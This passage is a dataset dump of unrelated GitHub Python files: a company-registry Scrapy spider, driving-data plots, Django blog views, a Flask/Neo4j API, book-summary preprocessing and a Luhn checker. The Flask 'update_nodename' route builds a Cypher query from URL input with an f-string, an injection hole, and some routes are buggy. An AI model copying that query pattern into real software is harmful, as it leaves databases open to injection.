print(predictionModel.__doc__)\r\n print(\"Prediction for Model\", model_list[i])\r\n year, sixth, prediction = predictionModel(coin_stock, model, prediction_start_date, prediction_end_date, scy)\r\n print(year)\r\n print(sixth)\r\n print(prediction)\r\n","repo_name":"emmad241/ftt-mobile","sub_path":"MLAlgorithm.py","file_name":"MLAlgorithm.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16829095399","text":"# -*- coding: utf-8 -*-\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom enterprise.items import EnterpriseItem\nfrom utils.base_tools import gen_md5, get_now_datetime\n\n\nclass QymSpider(CrawlSpider):\n name = 'qym_full'\n allowed_domains = ['qichamao.com']\n start_urls = ['https://www.qichamao.com']\n\n # 设置解析link的规则,callback是指解析link返回的响应数据的的方法\n rules = [\n Rule(\n LinkExtractor(\n allow='.*?orgcompany/searchitemdtl.*?',\n allow_domains='qichamao.com'\n ),\n callback='erp_parse', follow=True\n ),\n ]\n\n @staticmethod\n def erp_parse(response):\n \"\"\" 这个函数是解析的主函数\n :param response:\n :return:\n \"\"\"\n # 页面主要���息\n page_main_info = response.xpath(\n '*//ul[@class=\"art-basic\"]/li'\n '|*//ul[@class=\"art-basic art-basic-swot\"]/li'\n )\n\n item_dict = dict()\n for li in page_main_info:\n type_name = str(li.xpath(\n 'span[@class=\"tit\"]/text()'\n ).extract_first()).strip()\n\n type_value = str(li.xpath(\n 'span[@class=\"info\"]'\n ).xpath('string(.)').extract_first()).strip()\n\n item_dict[type_name] = type_value\n\n erp_info_dict = dict()\n # 企业基本信息\n erp_info_dict['erp_code'] = item_dict.get('统一社会信用代码:')\n erp_info_dict['taxpayers_code'] = item_dict.get('纳税人识别号:')\n erp_info_dict['registration_number'] = item_dict.get('注册号:')\n erp_info_dict['organization_code'] = item_dict.get('机构代码:')\n erp_info_dict['name'] = item_dict.get('名称:')\n erp_info_dict['legal_representative'] = item_dict.get('法定代表人:')\n erp_info_dict['erp_type'] = item_dict.get('企业类型:')\n erp_info_dict['erp_status'] = item_dict.get('经营状态:')\n erp_info_dict['registered_cap'] = item_dict.get('注册资本:')\n erp_info_dict['establish_date'] = item_dict.get('成立日期:')\n erp_info_dict['region'] = item_dict.get('所属地区:')\n erp_info_dict['approved_date'] = item_dict.get('核准日期:')\n erp_info_dict['business_scope'] = item_dict.get('经营范围:')\n\n # 行业标签\n erp_info_dict['industry'] = item_dict.get('所属行业:')\n erp_info_dict['forward_label'] = item_dict.get('前瞻标签:')\n erp_info_dict['exhibition_label'] = item_dict.get('展会标签:')\n\n # 额外的基础信息\n erp_info_dict['source_link_url'] = response.url\n erp_info_dict['html_body'] = response.body\n erp_info_dict['pk_md5'] = gen_md5(response.url)\n erp_info_dict['update_time'] = get_now_datetime()\n\n # 返回企业信息\n erp_item = EnterpriseItem()\n erp_item['table_name'] = 'qym_erp_info'\n erp_item['data_rows'] = [erp_info_dict]\n yield erp_item\n","repo_name":"parker-pu/enterprise","sub_path":"scrapy/enterprise/enterprise/spiders/qym_full.py","file_name":"qym_full.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"38868838246","text":"import pandas as pd\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom matplotlib.ticker import StrMethodFormatter\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\r\nTARGET = 'aug.road_type'\r\nseq_len = 30\r\nstep = 30\r\ndata_path = '..\\\\data_SHRP2\\\\windows\\\\all_targets\\\\labeled_sequence_win_' + str(step) + '_seq_' + str(seq_len) \\\r\n + '_new_multi_no_clean.csv'\r\n# data_path = '..\\\\data_SHRP2\\\\windows\\\\aug.road_type\\\\labeled_sequence_win_10_seq_30.csv'\r\n\r\n\r\n\r\n\r\ndef disply_hist(data, col):\r\n print(col)\r\n ax = data.hist(column=col, bins=25, grid=False, figsize=(12, 8), color='#86bf91', zorder=2, rwidth=0.9)\r\n ax = ax[0]\r\n for x in ax:\r\n\r\n # Despine\r\n x.spines['right'].set_visible(False)\r\n x.spines['top'].set_visible(False)\r\n x.spines['left'].set_visible(False)\r\n\r\n # Switch off ticks\r\n x.tick_params(axis=\"both\", which=\"both\", bottom=\"off\", top=\"off\", labelbottom=\"on\", left=\"off\", right=\"off\",\r\n labelleft=\"on\")\r\n\r\n # Draw horizontal axis lines\r\n vals = x.get_yticks()\r\n for tick in vals:\r\n x.axhline(y=tick, linestyle='dashed', alpha=0.4, color='#eeeeee', zorder=1)\r\n\r\n # Remove title\r\n # x.set_title()\r\n\r\n # Set x-axis label\r\n x.set_xlabel(\"\", labelpad=20, weight='bold', size=12)\r\n\r\n # Set y-axis label\r\n x.set_ylabel(\"\", labelpad=20, weight='bold', size=12)\r\n\r\n # Format y-axis label\r\n x.yaxis.set_major_formatter(StrMethodFormatter('{x:,g}'))\r\n\r\ndef disply_hist_1(data, coll):\r\n # An \"interface\" to matplotlib.axes.Axes.hist() method\r\n import matplotlib.pyplot as plt\r\n d = data[col]\r\n n, bins, patches = plt.hist(x=d.dropna().values, bins='auto', color='#0504aa',\r\n alpha=0.7, rwidth=0.85)\r\n plt.grid(axis='y', alpha=0.75)\r\n plt.xlabel('Value')\r\n plt.ylabel('Frequency')\r\n plt.title(col)\r\n plt.text(23, 45, r'$\\mu=15, b=3$')\r\n maxfreq = n.max()\r\n # Set a clean upper y-axis limit.\r\n # plt.ylim(ymax=np.ceil(maxfreq / 10) * 10 if maxfreq % 10 else maxfreq + 10)\r\n plt.show()\r\n\r\ndata = pd.read_csv(data_path)\r\n\r\n\r\nfig, ax = plt.subplots(1,1,figsize=(26,8))\r\ntmp = pd.DataFrame(data.groupby(['file_id', 'aug.road_type'])['series_num'].count().reset_index())\r\ntmp = tmp[0:30]\r\nm = tmp.pivot(index='aug.road_type', columns='file_id', values='series_num')\r\ns = sns.heatmap(m, linewidths=.1, linecolor='black', annot=True, cmap=\"YlGnBu\")\r\ns.set_title('Number of road_type category per file_id', size=16)\r\nplt.show()\r\n\r\n# print(data.columns)\r\n# print(data.describe())\r\n\r\nimport matplotlib.pyplot as plt\r\n# pd.options.display.mpl_style = 'default'\r\n# data.boxplot()\r\n\r\n\r\n\r\ncolumns = data.columns\r\n\r\npart_1 = ['vtti.accel_x',\r\n 'vtti.accel_y', 'vtti.accel_z', 'vtti.cruise_state',\r\n 'vtti.engine_rpm_instant', 'vtti.gyro_x', 'vtti.gyro_y', 'vtti.gyro_z',\r\n 'vtti.headlight', 'vtti.light_level', 'vtti.pedal_brake_state',\r\n 'vtti.pedal_gas_position', 'vtti.prndl', 'vtti.seatbelt_driver']\r\npart_2 = ['vtti.speed_network', 'vtti.steering_wheel_position',\r\n 'vtti.temperature_interior', 'vtti.traction_control_state',\r\n 'vtti.turn_signal', 'vtti.wiper']\r\n\r\nall_cols =part_1 + part_2\r\n\r\n# remove_cols = ['series_id', 'file_id', 'vtti.timestamp']\r\n# TARGETS_COLS = ['aug.road_type', 'aug.surfaceCondition', 'aug.lighting', 'aug.relationToJunction', 'aug.weather',\r\n# 'aug.locality']\r\n# data = data.drop(remove_cols + TARGETS_COLS)\r\n\r\n# disply_hist(data[part_1])\r\n# disply_hist(data[part_2])\r\n\r\nfor col in all_cols:\r\n disply_hist_1(data, col)\r\ndescribe = data.describe()\r\n\r\ndescribe.to_csv('./describe_no_clean.csv')","repo_name":"advahad/deep_can","sub_path":"util/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9567577466","text":"from . import views\nfrom django.urls import path\nfrom django.contrib.auth import views as auth_views \n# Add URLConf\nurlpatterns = [\n path('', views.PostListView.as_view(), name='post_list'),\n path('register/', auth_views.RegisterView.as_view(form_class=UserCreationForm, template_name='registration/register.html'), name='register'),\n path('login/', auth_views.LoginView.as_view(template_name='registration/login.html'), name='login'),\n path('logout/', auth_views.LogoutView.as_view(template_name='registration/logged_out.html'), name='logout'),\n path('post//', views.PostDetailView.as_view(), name='post_detail'),\n]","repo_name":"Yakumwamba/django-blogging-app","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72247932579","text":"from os import abort\n\nfrom flask import Flask, request, jsonify, redirect, render_template\nfrom neo4j import GraphDatabase\nimport csv, json\n\n# establish the connection\nwith open(\"cred.txt\") as f1:\n data = csv.reader(f1, delimiter=\",\")\n for row in data:\n username = row[0]\n pwd = row[1]\n uri = row[2]\nprint(username, pwd, uri)\ndriver = GraphDatabase.driver(uri=uri, auth=(username, pwd))\nsession = driver.session()\napi = Flask(__name__)\n\n\n@api.route(\"/create/\", methods=[\"GET\",\"POST\"])\ndef create_user(user):\n if not request.json or not 'name' in request.json:\n abort(400)\n user = {\n 'id': users[-1]['id'] + 1,\n 'name': request.json['name'],\n 'email':request.json['email'],\n 'gender':request.json['gender'],\n 'dob':request.json['dob'],\n 'mobilenumber':request.json[\"mobilenumber\"],\n 'city':request.json['city'],\n 'country':request.json['country'],\n 'qualdetails':request.json['qualdetails'],\n 'unidetails':request.json['unidetails'],\n 'studydetails':request.json['studyfield'],\n 'position':request.json['position'],\n 'description': request.json.get('description', \"\"),\n 'done': False\n }\n\n\n q1 = \"\"\"\n create (n:User{NAME:$name,EMAIL:$email,GENDER:$gender,DOB:$dob,MOBILENUMBER:$mobilenumber,CITY:$city,COUNTRY:$country,qualdetails:$qualdetails,unidetails:$unidetails,studyfield:$studyfield,position:$position})\n \"\"\"\n\n try:\n session.run(q1, user)\n return (\n f\"user node is created with username \")\n except Exception as e:\n return (str(e))\n\n\n@api.route(\"/update/&\", methods=[\"GET\", \"POST\"])\ndef update_nodename(nodename, newname):\n q1 = f\"\"\"\n match (n) where n.name=\"{nodename}\" set n.name=\"{newname}\" return n.name\n \"\"\"\n results = session.run(q1)\n return (f\" node name is updated to {newname}\")\n\n\nif __name__ == \"__main__\":\n api.run(port=5050)\n","repo_name":"kaveshdgr8/neo4jwithflask","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2817108673","text":"import pandas as pd\nimport json\nimport re\nimport csv\nfrom tqdm import tqdm\n\n\ndef clean_summary(text):\n text = re.sub(\"\\'\", \"\", text)\n text = re.sub(\"[^a-zA-Z]\", \" \", text)\n text = ' '.join(text.split())\n text = text.lower()\n return text\n\n\ndef main():\n data = []\n\n with open(\"booksummaries.txt\", 'r', encoding='utf-8') as f:\n reader = csv.reader(f, dialect='excel-tab')\n for row in tqdm(reader):\n data.append(row)\n\n book_index = []\n book_id = []\n book_author = []\n book_name = []\n summary = []\n genre = []\n a = 1\n for i in tqdm(data):\n book_index.append(a)\n a = a + 1\n book_id.append(i[0])\n book_name.append(i[2])\n book_author.append(i[3])\n genre.append(i[5])\n summary.append(i[6])\n\n df = pd.DataFrame({'Index': book_index, 'ID': book_id, 'BookTitle': book_name, 'Author': book_author,\n 'Genre': genre, 'Summary': summary})\n\n # Cleaning up Genres\n df.isna().sum()\n\n df = df.drop(df[df['Genre'] == ''].index)\n df = df.drop(df[df['Summary'] == ''].index)\n\n genres_cleaned = []\n for i in df['Genre']:\n genres_cleaned.append(list(json.loads(i).values()))\n df['Genres'] = genres_cleaned\n\n # Cleaning up summaries\n df['clean_summary'] = df['Summary'].apply(lambda x: clean_summary(x))\n\n # saving to json\n save_kb(df)\n\n\ndef save_kb(df):\n cols_to_include = ['ID', 'BookTitle', 'Author', 'Genres', 'clean_summary']\n df_subset = df[cols_to_include]\n\n # save the DataFrame subset as a JSON file\n df_subset.to_json('book_summaries.json', orient='records')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rigrergl/nlp_portfolio","sub_path":"chatbot/knowledge_base/gen_books_kb.py","file_name":"gen_books_kb.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36536915030","text":"from lxml import etree\n# print(html_data)\nimport requests\nimport codecs\ndef saveUrlAsUtf(base):\n response = requests.get(\n 'http://cmpbook.com/searchbook.php?pagestart='+str(base)+\"&action=search&title=&series=%BE%AD%B5%E4%D4%AD%B0%E6&isbn=&publictime=&storetime=&searchword=&s1=&s2=&Submit=%CB%D1%CB%F7&orderby=publictime\")\n html = str(response.content.decode('gb2312').encode('utf-8'), 'utf-8')\n file = codecs.open(\"SearchReslutPages/\"+base.__str__()+\".html\", \"w\", \"utf-8\")\n file.write(html)\n file.close()\n# saveUrlAsUtf()\ndef xpath():\n # html = etree.parse('text.html', etree.HTMLParser())\n # result = etree.tostring(html)\n # html_data = html.xpath('/html/body/table/tbody/tr/td/table/tbody/tr/td/table/tbody/tr')\n hxml = etree.HTML(open('text.html', 'r').read())\n htree = etree.ElementTree(hxml)\n\n html_data = htree.xpath(\"/html/body/table/tbody/tr/td\")\n\n data_list = html_data[8].xpath(\"//span/text()\")\n for d in data_list:\n print(d)\n\ndef savePages():\n for i in range(1, 85):\n # baseUrl = 'http://cmpbook.com/searchbook.php?pagestart=' + i.__str__() + '&action=search&title=&series=%BE%AD%B5%E4%D4%AD%B0%E6&isbn=&publictime=&storetime=&searchword=&s1=&s2=&Submit=%CB%D1%CB%F7&orderby=publictime'\n saveUrlAsUtf(i)\n print(\"Processing\"+i.__str__)\n # resp = requests.get(baseUrl)\n # html = str(resp.content.decode('gb2312').encode('utf-8'), 'utf-8')\n\n\nsavePages()\n# print(html)\n\n# f.write(html)\n","repo_name":"c3730915/Python_spider","sub_path":"GetEnglishBookLists/getPages.py","file_name":"getPages.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"13010059360","text":"import re\nclass Luhn:\n def __init__(self, card_num):\n self.card_num = card_num\n \n def valid(self):\n space_less = re.sub(r'\\s+', '', self.card_num)\n if not all([s.isdigit() for s in space_less]) or len(space_less) <= 1:\n return False \n int_list = [int(s) for s in space_less]\n doubled = [(l*2) if i % 2 != 0 \n else l for i, l in enumerate(reversed(int_list))]\n final = [(d-9) if d > 9 else d for d in doubled]\n return sum(final) % 10 == 0\n ","repo_name":"PetaGb/ExercismSolutions","sub_path":"Luhn/luhn.py","file_name":"luhn.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21904132794","text":"import numpy as np\nimport cPickle\nimport splitdata\nimport boost_mod as boost\nimport pdb\n\nproject_path = '/proj/ar2384/picorna/'\nvirus_family = 'rhabdo'\n\nk = 8\nM = 4\nfor m in range(M):\n input_file = project_path+'cache/%s_temp/%s_virii_data_%d_%d.pkl' % (virus_family, virus_family, k, m)\n f = open(input_file,'r')\n Xt = cPickle.load(f)\n Yt = cPickle.load(f)\n kmer_dict = cPickle.load(f)\n f.close()\n\n # make Xt, Yt memory-efficient\n Xt = Xt.astype('int16')\n Yt = Yt.astype('int16')\n Nt = Yt.shape[1]\n T = 20\n predicted_labels = np.zeros((Nt,T),dtype='int16')\n\n # number of folds of cross validation\n Nfold = 10\n\n # split the data indices into 10 random disjoint sets\n Fidx = splitdata.cv_multiclass_fold(Yt,Nfold)\n\n for fold in range(Nfold):\n params = (fold,k,m,T)\n # using each set as the test set and the rest as train sets\n # split the data and run boosting\n X, Y, x, y, Idx = splitdata.cv_split(Xt,Yt,Fidx[fold])\n predicted_labels = boost.adaboost(X, Y, x, y, predicted_labels, Fidx[fold], params, kmer_dict, model='tree', virus_family=virus_family)\n\n output_file = project_path+'cache/%s_temp/%s_virii_test_output_%d_%d.pkl' % (virus_family, virus_family, k, m)\n f = open(output_file,'w')\n cPickle.Pickler(f,protocol=2).dump(Fidx)\n cPickle.Pickler(f,protocol=2).dump(predicted_labels)\n f.close()\n","repo_name":"mikedewar/picorna","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"32021072113","text":"import config as cfg\nimport pandas as pd\nimport sys\nimport math\n\n\ndef main():\n calculate_regions()\n # calculate_sequences()\n # calculate_regions_size()\n\n\ndef calculate_regions_size():\n regs = pd.read_csv(cfg.data['sequences_regions'] + '/search_in_disprot.tsv', sep='\\t').drop_duplicates(\n subset=['disprot_id'], keep=False)\n print(regs)\n\n\ndef calculate_sequences():\n # added temporary header to calculate this\n ids1 = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['id1']\n\n ids2 = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['id2']\n\n ids = pd.concat([ids1, ids2]).drop_duplicates()\n df = pd.DataFrame()\n df['disprot_id'] = ids\n calculate_regions()\n\n\ndef calculate_regions():\n # ids1 = pd.read_csv(cfg.data['alignments'] + '/global_triangular_matrix.csv', sep='\\t')['id1']\n #\n # ids2 = pd.read_csv(cfg.data['alignments'] + '/global_triangular_matrix.csv', sep='\\t')['id2']\n #\n # ids = pd.concat([ids1, ids2]).drop_duplicates()\n # df = pd.DataFrame()\n # df['acc'] = ids\n\n # ids1 = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['id1']\n #\n # ids2 = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['id2']\n #\n # ids = pd.concat([ids1, ids2]).drop_duplicates()\n # df = pd.DataFrame()\n # df['disprot_id'] = ids\n\n # reg = pd.read_csv(cfg.data['sequences_regions'] + '/search_in_disprot.tsv', sep='\\t')\n # merged_df = reg.merge(df, on='disprot_id')\n # merged_df = reg.drop_duplicates(subset=['acc', 'start', 'end'], keep=False)\n # size = len(merged_df)\n # tot_reg = pd.read_csv(cfg.bash['results'] + '/all-global-needle.txt', sep='\\t')['reg2'].dropna()\n tot_reg = pd.read_csv(cfg.data['filtering'] + '/filter-needle-identity.txt', sep='\\t')['reg1'].dropna()\n\n count = 0\n for row in tot_reg:\n print(row)\n\n values = row.split(',')\n for value in values:\n count += 1\n print(count)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"mb925/homologsAnalysis","sub_path":"src/calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72289489699","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import View\nfrom django.urls import reverse_lazy\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\nfrom django.contrib import messages\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.conf import settings\nfrom rest_framework import generics\nfrom .models import *\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\n# from django.views import View\nfrom django.forms.models import modelformset_factory\nfrom django.template import RequestContext\nimport os\n\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import (\n SubServicesForm,\n TestimonialForm,\n TestimonialUpdateForm,\n SliderHomeForm,\n AboutForm,\n ServicesForm,\n ServicesUpdateForm,\n ServiceTypeForm,\n PortFolioForm,\n FeaturesForm,\n TeamForm,\n ClientsForm,\n ContactForm,\n ContactMessageForm,\n PortFolioForm,\n PortFolioUpdateForm,\n\n \n)\n\n# for sending data to the admin mail address\ndef send_mail_all(context, email):\n content = {\"%s: %s\" % (key, value) for (key, value) in context.items()}\n content = \"\\n\".join(content)\n\n send_mail(\n 'Contact Message', # subject\n content, # message\n settings.EMAIL_HOST_USER, # from email\n ['arjunkhattri83@gmail.com'],\n fail_silently=False)\n\n@login_required\ndef dashboard(request):\n business_title = SliderHome.objects.all()\n context = {'business_title': business_title}\n return render(request, 'dashboard/dashboard.html', context)\n\n\n@login_required\ndef testimonials_list(request):\n review_list = Testimonials.objects.all()\n context = {'review_list':review_list}\n return render(request, 'testimonials/list.html', context)\n \n@login_required\ndef create_testimonials(request):\n create_review = Testimonials.objects.all()\n if request.method == 'POST':\n form = TestimonialForm(request.POST or None, request.FILES)\n try:\n if form.is_valid():\n form.save()\n messages.success(request,('New Testimonail created! '))\n return redirect('testimonials_list')\n else:\n messages.error(request, 'Invalid Testimonial details')\n return redirect('create_testimonials')\n except:\n if Testimonials.objects.filter(author__iexact = form.cleaned_data['author']).exists():\n messages.error(request, 'Testimonial already exists')\n return redirect('testimonails_list')\n else:\n context = {'create_review': create_review}\n return render(request, 'testimonials/create.html', context)\n\n@login_required\ndef testimonials_details(request, name):\n review_details = Testimonials.objects.get(author=name)\n context = {'review_details': review_details }\n return render(request, 'testimonials/detail.html',context)\n\n\n@login_required\ndef update_testimonials(request, name):\n review_update = Testimonials.objects.get(author=name)\n if request.method == 'POST':\n form = TestimonialUpdateForm(request.POST or None, request.FILES, instance=review_update)\n try:\n if form.is_valid():\n review_update.save()\n else:\n review_update.quote = request.POST.get('quote')\n review_update.save()\n messages.success(request, \"Testimonials Updated\")\n return redirect('testimonials_list')\n except:\n messages.error(request, \"Unable to update testimonial\")\n return redirect('testimonials_list')\n\n elif request.method == 'GET':\n context={'review_update': review_update}\n return render(request, 'testimonials/update.html', context)\n\n\n@login_required\ndef delete_testimonials(request, author):\n testimonials = Testimonials.objects.get(author=author)\n testimonials.delete()\n messages.success(request, \"Testimonials Deleted!\")\n return redirect('testimonials_list')\n\n\n@login_required\ndef carousel_list(request):\n carousel= SliderHome.objects.all()\n context = {'carousel': carousel}\n return render(request, 'page/carousel/list.html', context)\n\n\n\n\n@login_required\ndef carousel_create(request):\n if request.method == \"POST\":\n form = SliderHomeForm(request.POST or None, request.FILES)\n try:\n if form.save():\n form.save()\n messages.success(request, 'HomeSlider details added')\n return redirect('carousel_list')\n else:\n messages.error(request, 'Invalid home details entered')\n return redirect('carousel_list')\n except:\n return redirect('carousel_list')\n else:\n return render(request, 'page/carousel/create.html') \n\n@login_required\ndef carousel_detail(request, name): \n carouseldetail = SliderHome.objects.get(title=name)\n context = {'carouseldetail':carouseldetail}\n return render(request, 'page/carousel/detail.html', context)\n\n@login_required\ndef carousel_update(request, name):\n carouselupdate = SliderHome.objects.get(title=name) \n if request.method=='POST':\n form = SliderHomeForm(request.POST or None, request.FILES, instance=carouselupdate)\n if form.is_valid():\n form.save()\n messages.success(request, 'carousel information updated!')\n return redirect('carousel_list')\n else:\n messages.error(request, 'Invalid home information!')\n return redirect('carousel_list')\n else:\n context = {'carouselupdate': carouselupdate}\n return render (request, 'page/carousel/update.html', context)\n\n\n@login_required\ndef carousel_delete(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(SliderHome, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('carousel_list')\n\n\treturn render (request, 'page/carousel/delete.html', context)\n\n@login_required\ndef about_info(request):\n info = About.objects.all().first()\n context = {'info': info}\n return render(request, 'page/about/view.html', context)\n\n@login_required\ndef about_create(request):\n if request.method == 'POST':\n form = AboutForm(request.POST or None, request.FILES)\n try:\n if form.save():\n form.save()\n messages.success(request, 'About Details Added')\n return redirect('about_info')\n else:\n messages.error(request, 'Invalid About Details Entered!!')\n return redirect('about_info')\n except:\n return redirect('about_info')\n else:\n return render(request, 'page/about/create.html')\n\n@login_required\ndef about_update(request):\n info = About.objects.all().last()\n if request.method == 'POST':\n form = AboutForm(request.POST or None, request.FILES, instance = info)\n try:\n if form.is_valid():\n form.save()\n messages.success(request, 'About Details Updated')\n return redirect('about_info')\n else:\n messages.error(request, 'Invalid About Details Entered')\n return redirect('about_info')\n except:\n return redirect('about_info')\n else:\n context = {'info': info}\n return render(request,'page/about/update.html', context)\n\n\n# @login_required\n# def service_type(request):\n# subtype = ServiceType.objects.all()\n# context = {'subtype': subtype}\n# return render(request, 'page/services/subtype/list.html', context)\n\n@login_required\ndef create_servicetype_list(request):\n subtype = ServiceType.objects.all()\n context = {'subtype': subtype}\n if request.method == 'POST':\n form = ServiceTypeForm(request.POST or None, request.FILES)\n try:\n if form.save():\n form.save()\n messages.success(request, 'Service type added')\n return redirect('create_servicetype')\n\n else:\n messages.error(request, 'Invalid Service Type Entered!')\n return redirect('create_servicetype')\n except:\n return redirect('create_servicetype')\n else:\n return render(request, 'page/services/subtype/create.html', context)\n\n@login_required\ndef delete_servicetype(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(ServiceType, id = id)\n\tif request.method ==\"POST\":\n\t\tobj.delete()\n\n\t\treturn redirect('create_servicetype')\n\n\treturn render (request, 'page/services/subtype/delete.html', context)\n\n@login_required\ndef services_list(request):\n subservices= SubServiceslist.objects.all()\n context = {'subservices':subservices}\n services = Services.objects.all()\n context = {'subservices': subservices, 'services': services}\n return render(request, 'page/services/list.html', context)\n\n\n# class ServiceListView(ListView):\n# model = Services\n# template_name = 'page/services/list.html'\n# context_object_name = 'services'\n \n\nclass ServicesCreateView(View):\n\n def get(self, request, *args, **kwargs):\n form = ServicesForm()\n return render(request, 'page/services/create.html', {'form':form})\n \n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n form = ServicesForm(request.POST or None, request.FILES)\n if form.is_valid():\n post = form.save(commit=False)\n post.save()\n\n for item in request.FILES.getlist('images'):\n longthumb = Preview_Images.objects.create(longthumb=item, service=post)\n longthumb.save()\n \n return redirect('services_list')\n else:\n messages.error(request, 'Invalid Services Details Entered')\n return redirect('services_list')\n else:\n return render(request, 'page/services/create.html')\n\n\nclass ServiceDetailView(DetailView):\n model = Services\n form_class = ServicesForm\n template_name = 'page/services/detail.html'\n\n\nclass ServiceUpdateView(UpdateView):\n model = Services\n form_class = ServicesUpdateForm\n template_name = 'page/services/update.html'\n\n def post(self, request, *args, **kwargs):\n services_qs = Services.objects.filter(pk=kwargs['pk'])\n \n if services_qs.exists():\n services = services_qs.first()\n form = self.form_class(request.POST or None, instance=services)\n if form.is_valid():\n post = form.save(commit=False)\n post.shortthumb = request.FILES.get('shortthumb')\n post.save()\n \n\n if len(request.FILES.getlist('images'))>0:\n longthumb = Preview_Images.objects.filter(service=post)\n if longthumb.exists():\n for images in longthumb:\n images.delete()\n for item in request.FILES.getlist('images'):\n images = Preview_Images.objects.create(longthumb=item, service=post)\n images.save()\n else:\n for item in request.FILES.getlist('images'):\n images = Preview_Images.objects.create(longthumb=item, service=post)\n images.save()\n \n return redirect('services_list')\n \n else:\n return redirect('update_services', pk=kwargs['pk'])\n else:\n return render(request, 'page/services/update.html', {\"services_qs\":services_qs})\n\nclass ServiceDeleteView(DeleteView):\n model = Services\n success_url = reverse_lazy('services_list')\n template_name = 'page/services/delete.html'\n\n # def get(self, request, *args, **kwargs):\n # return self.post(request, *args, **kwargs)\n \n \n# @login_required\n# def subservices_list(request):\n# subservices= SubServiceslist.objects.all()\n# context = {'subservices':subservices}\n# return render(request, 'page/services/subservices/list.html', context)\n\n@login_required\ndef subservices_detail(request, name): \n subservices = SubServiceslist.objects.filter(servicetitle=name)\n if subservices.exists():\n subservice =subservices.first()\n context = {'subservices':subservice}\n return render(request, 'page/services/subservices/detail.html', context)\n\n# @login_required\n# def create_subservices(request):\n# if request.method == 'POST':\n# form = SubServicesForm(request.POST or None, request.FILES)\n# try:\n# if form.is_valid():\n# form.save()\n# messages.success(request, 'Subservices Details Added')\n# return redirect('services_list')\n# else:\n# messages.error(request, 'Invalid Subservices Details Entered')\n# return render ('services_list')\n# except:\n# return redirect('services_list')\n \n# elif request.method == 'GET':\n# form = SubServicesForm()\n# context = { 'form':form}\n \n# return render(request, 'page/services/subservices/create.html', context)\n\nclass SubServicesCreateView(View):\n\n def get(self, request, *args, **kwargs):\n form = SubServicesForm()\n return render(request, 'page/services/subservices/create.html', {'form':form})\n \n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n form = SubServicesForm(request.POST or None, request.FILES)\n if form.is_valid():\n # post = form.save(commit=False)\n form.save()\n \n return redirect('services_list')\n else:\n messages.error(request, 'Invalid SubServices Details Entered')\n return redirect('services_list')\n else:\n return render(request, 'page/services/subservices/create.html')\n\n# @login_required\n# def update_subservices(request, pk):\n \n# subservices = SubServiceslist.objects.filter(id=pk)\n \n# s = subservices.first()\n# if request.method == 'POST':\n# form = SubServicesForm(request.POST or None, request.FILES, instance=s)\n# try:\n# if form.is_valid():\n# form.save()\n# messages.success(request, 'Subservices Details Updated!')\n# return redirect('services_list')\n# else:\n# messages.error(request, 'Invalid Subservice Details')\n# return render('services_list')\n# except:\n# return redirect('services_list')\n# elif request.method == 'GET':\n# form = SubServicesForm()\n# context = {'form':form}\n# return render(request, 'page/services/subservices/update.html', context)\n\nclass SubServiceUpdateView(UpdateView):\n model = SubServiceslist\n form_class = SubServicesForm\n template_name = 'page/services/subservices/update.html'\n\n def post(self, request, *args, **kwargs):\n qs = SubServiceslist.objects.filter(pk=kwargs['pk'])\n \n if qs.exists():\n subservices = qs.first()\n form = self.form_class(request.POST or None, instance=subservices)\n if form.is_valid():\n # post = form.save(commit=False)\n # post.shortthumb = request.FILES.get('shortthumb')\n form.save() \n \n return redirect('services_list')\n \n else:\n return redirect('update_subservices', pk=kwargs['pk'])\n else:\n return render(request, 'page/services/subservices/update.html', {'qs':qs})\n\n\n@login_required\ndef delete_subservices(request, id):\n\tcontext ={}\n\tobj = get_object_or_404(SubServiceslist, id = id)\n\tif request.method 